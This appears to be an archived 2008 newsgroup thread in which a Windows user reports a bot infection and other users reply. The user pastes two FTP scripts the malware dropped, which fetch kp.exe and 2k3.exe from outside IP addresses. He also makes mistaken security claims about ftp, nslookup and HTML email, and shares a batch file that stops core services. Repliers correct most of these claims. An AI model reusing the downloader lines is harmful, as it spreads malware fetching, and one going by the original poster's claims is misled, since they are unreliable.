Guest Terry Mester Posted March 31, 2008 Posted March 31, 2008 I have discovered how Spammers are able to access people's Computers to spew out their Spyware garbage, and it is Microsoft's OS which has made this possible! Spammers utilize two commands: the "nslookup" Command and the "ftp" Command found in c:\winnt\system32 -- which you can review in the Windows Help Menu. Spammers can also use a HTML E-Mail you open on your Computer while logged onto the Internet to download a Virus. Those E-Mails you get from friends telling you to forward it on to others, in order to get good luck or money, are nothing but a SCAM perpetrated by the Spammers! DELETE those E-Mails -- DO NOT open them!!! Last month after separately opening two of those E-Mails, I ended up with a Virus on my Computer spewing out data over the Internet, and also the following two Text Files given the name "i" under the 'winnt' Directory. --- \winnt\i open 136.145.69.79 2755 user 1 1 get kp.exe quit --- \winnt\i open 208.111.5.228 2755 user 1 1 get 2k3.exe quit --- The Virus Commands I subsequently found under the 'winnt' or 'system32' Directories corresponded to the two ".exe" Files named in those two Text Files. I didn't know where those 4 Command Lines in those "i" Files were executable until just today when I looked up the "ftp" Command in Help. Those are 4 sub-commands which caused my Computer to open up the said IP Address and Port#, log in as the user 1 1, download the Virus Command, and then quit "ftp". Since I'm a Dial-up user, I immediately noticed something wrong because this immediately clogged up my Internet Connection. A High Speed user might not notice anything! It is unbelievable, but the "ftp" Command enables the Spammer to log onto your Computer WITHOUT using an ID and Password! Further, "ftp" enables the Spammer to prevent you from seeing what it is doing on your Computer!!! I'm not kidding! Further still, the "nslookup" Command enables the Spammer to find out your IP Numbers and Computer ID so that he can use the "ftp" Command! It is as if Microsoft specifically designed these two Commands to help Spammers! As far as I can tell, you cannot disable either of these Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to "nslookup.exe.rename" in order to make them non-executable, but I don't think this will solve the problem. Would a Microsoft Corporation technician please inform us if these two Command functions can be disabled? If not, Microsoft needs to IMMEDIATELY provide a Service Pack or update to enable these two functions to be disabled using the "net stop / start" Command. With these functions disabled, a Firewall Application becomes completely unnecessary!
Guest The Kat Posted March 31, 2008 Posted March 31, 2008 Re: *** VIRUS WARNING!!! *** On Sun, 30 Mar 2008 20:59:00 -0700, Terry Mester <TerryMester@discussions.microsoft.com> wrote: >I have discovered how Spammers are able to access people's Computers to spew >out their Spyware garbage, and it is Microsoft's OS which has made this >possible! Spammers utilize two commands: the "nslookup" Command and the >"ftp" Command found in c:\winnt\system32 YOU are a moron, and shouldn't be allowed to use a computer. -- Lumber Cartel (tinlc) #2063. Spam this account at your own risk. This sig censored by the Office of Home, Land & Planet Insecurity... Remove XYZ to email me
Guest Terry Mester Posted March 31, 2008 Posted March 31, 2008 Re: *** VIRUS WARNING!!! *** YOU are probably one of those detestable Spammers, and you're worried that I've discovered your technique! "The Kat" wrote: > YOU are a moron, and shouldn't be allowed to use a computer.
Guest Pegasus \(MVP\) Posted March 31, 2008 Posted March 31, 2008 Re: *** VIRUS WARNING!!! *** "Terry Mester" <TerryMester@discussions.microsoft.com> wrote in message news:43465527-82B7-4AA1-A05F-81086E0A8BCA@microsoft.com... >I have discovered how Spammers are able to access people's Computers to >spew > out their Spyware garbage, and it is Microsoft's OS which has made this > possible! Spammers utilize two commands: the "nslookup" Command and the > "ftp" Command found in c:\winnt\system32 -- which you can review in the > Windows Help Menu. Spammers can also use a HTML E-Mail you open on your > Computer while logged onto the Internet to download a Virus. Those > E-Mails > you get from friends telling you to forward it on to others, in order to > get > good luck or money, are nothing but a SCAM perpetrated by the Spammers! > DELETE those E-Mails -- DO NOT open them!!! The problem is not ftp.exe or nslookup.exe - it's the stuff you received from "friends", promising you "luck" or "money". You need to become a little more computer-savvy: Don't open attachments sent by strangers, and be very careful when opening attachments sent by friends. Chances are that they haven't got the faintest idea about the stuff they're sending about: Fun programs, screen savers, elaborate "jokes" - all of them can spell trouble. Renaming ftp.exe or nslookup.exe is pointless. Change your habits and install/maintain a good virus scanner.
Guest David H. Lipman Posted April 1, 2008 Posted April 1, 2008 Re: *** VIRUS WARNING!!! *** From: "Terry Mester" <TerryMester@discussions.microsoft.com> | I have discovered how Spammers are able to access people's Computers to spew | out their Spyware garbage, and it is Microsoft's OS which has made this | possible! Spammers utilize two commands: the "nslookup" Command and the | "ftp" Command found in c:\winnt\system32 -- which you can review in the | Windows Help Menu. Spammers can also use a HTML E-Mail you open on your | Computer while logged onto the Internet to download a Virus. Those E-Mails | you get from friends telling you to forward it on to others, in order to get | good luck or money, are nothing but a SCAM perpetrated by the Spammers! | DELETE those E-Mails -- DO NOT open them!!! Last month after separately | opening two of those E-Mails, I ended up with a Virus on my Computer spewing | out data over the Internet, and also the following two Text Files given the | name "i" under the 'winnt' Directory. | --- \winnt\i | open 136.145.69.79 2755 | user 1 1 | get kp.exe | quit | --- \winnt\i | open 208.111.5.228 2755 | user 1 1 | get 2k3.exe | quit | --- | The Virus Commands I subsequently found under the 'winnt' or 'system32' | Directories corresponded to the two ".exe" Files named in those two Text | Files. I didn't know where those 4 Command Lines in those "i" Files were | executable until just today when I looked up the "ftp" Command in Help. | Those are 4 sub-commands which caused my Computer to open up the said IP | Address and Port#, log in as the user 1 1, download the Virus Command, and | then quit "ftp". Since I'm a Dial-up user, I immediately noticed something | wrong because this immediately clogged up my Internet Connection. A High | Speed user might not notice anything! | | It is unbelievable, but the "ftp" Command enables the Spammer to log onto | your Computer WITHOUT using an ID and Password! Further, "ftp" enables the | Spammer to prevent you from seeing what it is doing on your Computer!!! I'm | not kidding! Further still, the "nslookup" Command enables the Spammer to | find out your IP Numbers and Computer ID so that he can use the "ftp" | Command! It is as if Microsoft specifically designed these two Commands to | help Spammers! As far as I can tell, you cannot disable either of these | Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to | "nslookup.exe.rename" in order to make them non-executable, but I don't think | this will solve the problem. Would a Microsoft Corporation technician please | inform us if these two Command functions can be disabled? If not, Microsoft | needs to IMMEDIATELY provide a Service Pack or update to enable these two | functions to be disabled using the "net stop / start" Command. With these | functions disabled, a Firewall Application becomes completely unnecessary! This is NOT new an is well known in the anti malware community. What you have decscribed is a BOT action. If it is on the PC, the PC is already infected. The infector creates a script and uses the FTP command to download its peer software. A batch file then uses the script to automate the FTP process. If file protection is properly working, you can not rename FTP.EXE as it will just reinstate itself. NSLOOKUP has nothing to do with it. What this shows is that you did not have anti virus installed and/or prioperly updated. BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no patch because you have to be infected first before the FTP.EXE command will be used maliciously. You shoud also know there are Trojans that hijack the BITS Service to download peers. -- Dave http://www.claymania.com/removal-trojan-adware.html Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
Guest Terry Mester Posted April 1, 2008 Posted April 1, 2008 Re: *** VIRUS WARNING!!! *** Pegasus (MVP) 3/31/2008 2:47 AM PST "You need to become a little more computer-savvy: Don't open attachments sent by strangers, and be very careful when opening attachments sent by friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your habits and install/maintain a good virus scanner. " I was not referring to opening "executable" E-Mail Attachments (.exe, .com, ..bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the ability to create a Text File on the Hard Drive -- as with the two Files above. You don't need to open any type of Attachment. It is unsafe to even LOOK at these Junk E-Mails! I now know better, and I'm simply warning others. As for a Virus Scanner / Firewall, I have a Pentium III Computer, and it slows my Computer down too much and so I had to disable it. This problem is the exclusive fault of Microsoft who has produced defective security protocols in its Operating Systems -- unlike Apple and Linux! ________________________________________ David H. Lipman 3/31/2008 5:52 PM PST " The infector creates a script and uses the FTP command to download its peer software. " I know this. The point of this Thread is to warn people that an HTML E-Mail (Body) can create this Script Text File -- you don't have to open any Attachment, and I didn't open any! ________________________________________ David H. Lipman 3/31/2008 5:52 PM PST " If file protection is properly working, you can not rename FTP.EXE as it will just reinstate itself. " You are 100% correct. I only realized this after posting this Thread. ________________________________________ David H. Lipman 3/31/2008 5:52 PM PST " NSLOOKUP has nothing to do with it." In my personal case, nslookup probably wasn't used. However, nslookup would definitely enable you to spam a specific person's Computer as long as you know their Internet Server. If you're out to breach a specific Computer, nslookup is what you need to do it. ________________________________________ David H. Lipman 3/31/2008 5:52 PM PST "What this shows is that you did not have anti virus installed and/or prioperly updated. BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no patch because you have to be infected first before the FTP.EXE command will be used maliciously." As I mentioned above, I cannot install a Firewall because I only have a Pentium III with 128M of RAM. I haven't been infected since February 21st when I last viewed such an E-Mail. I have since been undertaking the following measures in a Batch Command to protect my Computer before logging onto the Internet: net stop "remote access auto connection manager" net stop "remote access connection manager" net stop "routing and remote access" net stop "remote registry service" net stop "RPClocator" net stop "RPCss" net stop "messenger" net stop "net logon" I'm not certain how much protection this provides me. I also now generally use the Internet only while logged into my Computer as a regular "user" and not an "administrator". ________________________________________ David H. Lipman 3/31/2008 5:52 PM PST "You shoud also know there are Trojans that hijack the BITS Service to download peers." I'm not familiar with this "BITS Service" you refer to. Can you elaborate further?
Guest What's in a Name? Posted April 1, 2008 Posted April 1, 2008 Re: *** VIRUS WARNING!!! *** Re: *** VIRUS WARNING!!! *** Terry Mester after much thought,came up with this jewel: > Pegasus (MVP) 3/31/2008 2:47 AM PST > "You need to become a little more computer-savvy: Don't open > attachments sent by strangers, and be very careful when opening > attachments sent by friends. ... Renaming ftp.exe or nslookup.exe is > pointless. Change your habits and install/maintain a good virus > scanner. " > > I was not referring to opening "executable" E-Mail Attachments (.exe, > .com, .bat, .cmd). I'm talking about the abilities of an HTML (as > opposed to Plain Text) E-Mail. Within about 3 Seconds of "viewing" > an HTML E-Mail, it has the ability to create a Text File on the Hard > Drive -- as with the two Files above. You don't need to open any > type of Attachment. It is unsafe to even LOOK at these Junk E-Mails! > I now know better, and I'm simply warning others. As for a Virus > Scanner / Firewall, I have a Pentium III Computer, and it slows my > Computer down too much and so I had to disable it. This problem is > the exclusive fault of Microsoft who has produced defective security > protocols in its Operating Systems -- unlike Apple and Linux! You have no idea what your talking about. There are security defects in all OSes. > > ________________________________________ > David H. Lipman 3/31/2008 5:52 PM PST > " The infector creates a script and uses the FTP command to download > its peer software. " > > I know this. The point of this Thread is to warn people that an HTML > E-Mail (Body) can create this Script Text File -- you don't have to > open any Attachment, and I didn't open any! set your e-mail client to "text only" > > ________________________________________ > David H. Lipman 3/31/2008 5:52 PM PST > " If file protection is properly working, you can not rename FTP.EXE > as it will just reinstate itself. " > > You are 100% correct. I only realized this after posting this Thread. > > ________________________________________ > David H. Lipman 3/31/2008 5:52 PM PST > " NSLOOKUP has nothing to do with it." > > In my personal case, nslookup probably wasn't used. However, > nslookup would definitely enable you to spam a specific person's > Computer as long as you know their Internet Server. If you're out to > breach a specific Computer, nslookup is what you need to do it. > > ________________________________________ > David H. Lipman 3/31/2008 5:52 PM PST > "What this shows is that you did not have anti virus installed and/or > prioperly updated. > BTW: Microsoft is fully aware of the situation and I guarantee you > that there will be no patch because you have to be infected first > before the FTP.EXE command will be used maliciously." > > As I mentioned above, I cannot install a Firewall because I only have > a Pentium III with 128M of RAM. Buy more RAM(the cost has dropped) and a NAT router(under $50 US) with a built-in firewall. AntiVir uses very little RAM. So does ThreatFire. GhostWall firewall is very small also. > I haven't been infected since > February 21st when I last viewed such an E-Mail. You need a more secure e-mail client-try Thunderbird. > I have since been > undertaking the following measures in a Batch Command to protect my > Computer before logging onto the Internet: > net stop "remote access auto connection manager" > net stop "remote access connection manager" > net stop "routing and remote access" > net stop "remote registry service" > net stop "RPClocator" > net stop "RPCss" > net stop "messenger" > net stop "net logon" > I'm not certain how much protection this provides me. I also now > generally use the Internet only while logged into my Computer as a > regular "user" and not an "administrator". > You should open services and disable from there. > ________________________________________ > David H. Lipman 3/31/2008 5:52 PM PST > "You shoud also know there are Trojans that hijack the BITS Service > to download peers." > > I'm not familiar with this "BITS Service" you refer to. Can you > elaborate further? Google is your friend max -- Virus Removal http://max.shplink.com/removal.html Keep Clean http://max.shplink.com/keepingclean.html Tools http://max.shplink.com/tools.html Change nomail.afraid.org to gmail.com to reply by email. I was lost,but now I'm blind.
Guest Terry Mester Posted April 1, 2008 Posted April 1, 2008 Re: *** VIRUS WARNING!!! *** Re: *** VIRUS WARNING!!! *** What's in a Name? 3/31/2008 8:46 PM PST "Terry Mester after much thought,came up with this jewel:" ANS: Going by this comment and the quotes you provided in your Post, I think you are confusing the Original Poster's comments with my answers. I had put the OPs comments in "quotes". ________________________________________ What's in a Name? 3/31/2008 8:46 PM PST " There are security defects in all OSes. " ANS: I'm sure that Apple and Linux have some security problems, but I'm also sure you would agree that Microsoft has a very high number of problems. Don't you think it should be possible to turn 'ftp' off! ________________________________________ What's in a Name? 3/31/2008 8:46 PM PST " Buy more RAM(the cost has dropped) and a NAT router(under $50 US)" ANS: My main problem is that my Processor is only 935 MHz. I can buy more Memory, however, it has to be the same company brand! When I tried installing a different brand of SIMM Memory Chip on my former Computer, the Processor wouldn't recognize it! Can you explain that? ________________________________________ What's in a Name? 3/31/2008 8:46 PM PST " You need a more secure e-mail client-try Thunderbird." ANS: I have been using Thunderbird for 2 years. However, I don't think you can expect TBird to scan the contents of an HTML Message. Those two "i" Text Files put onto my Hard Drive were pretty benign. I now know better than to view such a Message, and I always review my E-Mail "offline" so that nothing can get downloaded from a Message. I believe the last time this happened to me was from a Message on Hotmail -- which of course has to be opened "online". I now know better than to open them. It is vitally important for Internet users to know that you can get infected by just 'looking' at a spam E-Mail without an Attachment, and to know that these Messages telling you to forward it on are a new spammer technique. I might still have the original Message on my Hotmail Account. If you're interested in scrutinizing it, I could forward it to you.
Guest David H. Lipman Posted April 1, 2008 Posted April 1, 2008 Re: *** VIRUS WARNING!!! *** From: "Terry Mester" <TerryMester@discussions.microsoft.com> | Pegasus (MVP) 3/31/2008 2:47 AM PST | "You need to become a little more computer-savvy: Don't open attachments | sent by strangers, and be very careful when opening attachments sent by | friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your | habits and install/maintain a good virus scanner. " | | I was not referring to opening "executable" E-Mail Attachments (.exe, .com, | .bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain | Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the | ability to create a Text File on the Hard Drive -- as with the two Files | above. You don't need to open any type of Attachment. It is unsafe to even | LOOK at these Junk E-Mails! I now know better, and I'm simply warning | others. As for a Virus Scanner / Firewall, I have a Pentium III Computer, | and it slows my Computer down too much and so I had to disable it. This | problem is the exclusive fault of Microsoft who has produced defective | security protocols in its Operating Systems -- unlike Apple and Linux! Add RAM. RAM is cheap Today! Use anti virus, [practice Safe Hex or you will be infected again ! | ________________________________________ | David H. Lipman 3/31/2008 5:52 PM PST | " The infector creates a script and uses the FTP command to download its | peer software. " | | I know this. The point of this Thread is to warn people that an HTML E-Mail | (Body) can create this Script Text File -- you don't have to open any | Attachment, and I didn't open any! | The HTML did NOT create the BOT script. You may have clicked on a link in the HTML that caused the malware to be installed. | ________________________________________ | David H. Lipman 3/31/2008 5:52 PM PST | " If file protection is properly working, you can not rename FTP.EXE as it | will just reinstate itself. " | | You are 100% correct. I only realized this after posting this Thread. I know I was. | | ________________________________________ | David H. Lipman 3/31/2008 5:52 PM PST | " NSLOOKUP has nothing to do with it." | | In my personal case, nslookup probably wasn't used. However, nslookup would | definitely enable you to spam a specific person's Computer as long as you | know their Internet Server. If you're out to breach a specific Computer, | nslookup is what you need to do it. | NSLOOKUP would NOT help "spam". It is purely a names resolution lookup utility and that's all. | ________________________________________ | David H. Lipman 3/31/2008 5:52 PM PST | "What this shows is that you did not have anti virus installed and/or | prioperly updated. | BTW: Microsoft is fully aware of the situation and I guarantee you that | there will be no patch because you have to be infected first before the | FTP.EXE command will be used maliciously." | | As I mentioned above, I cannot install a Firewall because I only have a | Pentium III with 128M of RAM. I haven't been infected since February 21st | when I last viewed such an E-Mail. I have since been undertaking the | following measures in a Batch Command to protect my Computer before logging | onto the Internet: | net stop "remote access auto connection manager" | net stop "remote access connection manager" | net stop "routing and remote access" | net stop "remote registry service" | net stop "RPClocator" | net stop "RPCss" | net stop "messenger" | net stop "net logon" | I'm not certain how much protection this provides me. I also now generally | use the Internet only while logged into my Computer as a regular "user" and | not an "administrator". All you have done is cripple the OS. A completely wrong approach! | ________________________________________ | David H. Lipman 3/31/2008 5:52 PM PST | "You shoud also know there are Trojans that hijack the BITS Service to | download peers." | | I'm not familiar with this "BITS Service" you refer to. Can you elaborate | further? BITS is used by the MS Auto Update process for downloading ctrical and other MS updates. I again repeat... Use anti virus software ! Example: AntiVirir Free -- http://www.freeav.com If you are unwilling to use AV software and putrchase RAM, diconnect the PC from the Internet. -- Dave http://www.claymania.com/removal-trojan-adware.html Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
Guest John John Posted April 1, 2008 Posted April 1, 2008 Re: *** VIRUS WARNING!!! *** Terry Mester wrote: > ________________________________________ > David H. Lipman 3/31/2008 5:52 PM PST > "What this shows is that you did not have anti virus installed and/or > prioperly updated. > BTW: Microsoft is fully aware of the situation and I guarantee you that > there will be no patch because you have to be infected first before the > FTP.EXE command will be used maliciously." > > As I mentioned above, I cannot install a Firewall because I only have a > Pentium III with 128M of RAM. I haven't been infected since February 21st > when I last viewed such an E-Mail. I have since been undertaking the > following measures in a Batch Command to protect my Computer before logging > onto the Internet: > net stop "remote access auto connection manager" > net stop "remote access connection manager" > net stop "routing and remote access" > net stop "remote registry service" > net stop "RPClocator" > net stop "RPCss" > net stop "messenger" > net stop "net logon" > I'm not certain how much protection this provides me. I also now generally > use the Internet only while logged into my Computer as a regular "user" and > not an "administrator". Why you need to use a batch file to kill services is something only you know, all services can be set to manual start or they can be completely disabled if they truly are unneeded, there isn't much need to use a batch file to kill the above services, their start behaviour can easily be changed in the Services Management Console. Killing RPCss is a good way to effectively cripple the Windows session, hardly nothing works properly without this service! John
Guest What's in a Name? Posted April 1, 2008 Posted April 1, 2008 Re: *** VIRUS WARNING!!! *** Re: *** VIRUS WARNING!!! *** Terry Mester after much thought,came up with this jewel: > What's in a Name? 3/31/2008 8:46 PM PST > "Terry Mester after much thought,came up with this jewel:" > > ANS: Going by this comment and the quotes you provided in your Post, > I think you are confusing the Original Poster's comments with my > answers. I had put the OPs comments in "quotes". > > ________________________________________ > What's in a Name? 3/31/2008 8:46 PM PST > " There are security defects in all OSes. " > > ANS: I'm sure that Apple and Linux have some security problems, but > I'm also sure you would agree that Microsoft has a very high number > of problems. Don't you think it should be possible to turn 'ftp' off! I'm not sure about turning off FTP. But about Linux security, Here,do some light reading: http://www.networkworld.com/newsletters/linux/2006/0501linux1.html?fsrc= rss-virusworms > > ________________________________________ > What's in a Name? 3/31/2008 8:46 PM PST > " Buy more RAM(the cost has dropped) and a NAT router(under $50 US)" > > ANS: My main problem is that my Processor is only 935 MHz. I can > buy more Memory, however, it has to be the same company brand! When > I tried installing a different brand of SIMM Memory Chip on my former > Computer, the Processor wouldn't recognize it! Can you explain that? > I have 2 systems with 666mz/512mb running XPpro just fine. Perhaps there are some changes needed in the BIOS? > ________________________________________ > What's in a Name? 3/31/2008 8:46 PM PST > " You need a more secure e-mail client-try Thunderbird." > > ANS: I have been using Thunderbird for 2 years. However, I don't > think you can expect TBird to scan the contents of an HTML Message. > Those two "i" Text Files put onto my Hard Drive were pretty benign. > I now know better than to view such a Message, and I always review my > E-Mail "offline" so that nothing can get downloaded from a Message. > I believe the last time this happened to me was from a Message on > Hotmail -- which of course has to be opened "online". I never use the web interface. I use Thunderbird to check all my mail (hotmail,yahoo,pop3). If you need some help setting up Thunderbird, let me know. > I now know > better than to open them. It is vitally important for Internet users > to know that you can get infected by just 'looking' at a spam E-Mail > without an Attachment, and to know that these Messages telling you to > forward it on are a new spammer technique. I might still have the > original Message on my Hotmail Account. If you're interested in > scrutinizing it, I could forward it to you. I guess that HTML needs turned off by default in all e-mail clients. max -- Virus Removal http://max.shplink.com/removal.html Keep Clean http://max.shplink.com/keepingclean.html Tools http://max.shplink.com/tools.html Change nomail.afraid.org to gmail.com to reply by email. I was lost,but now I'm blind.
Recommended Posts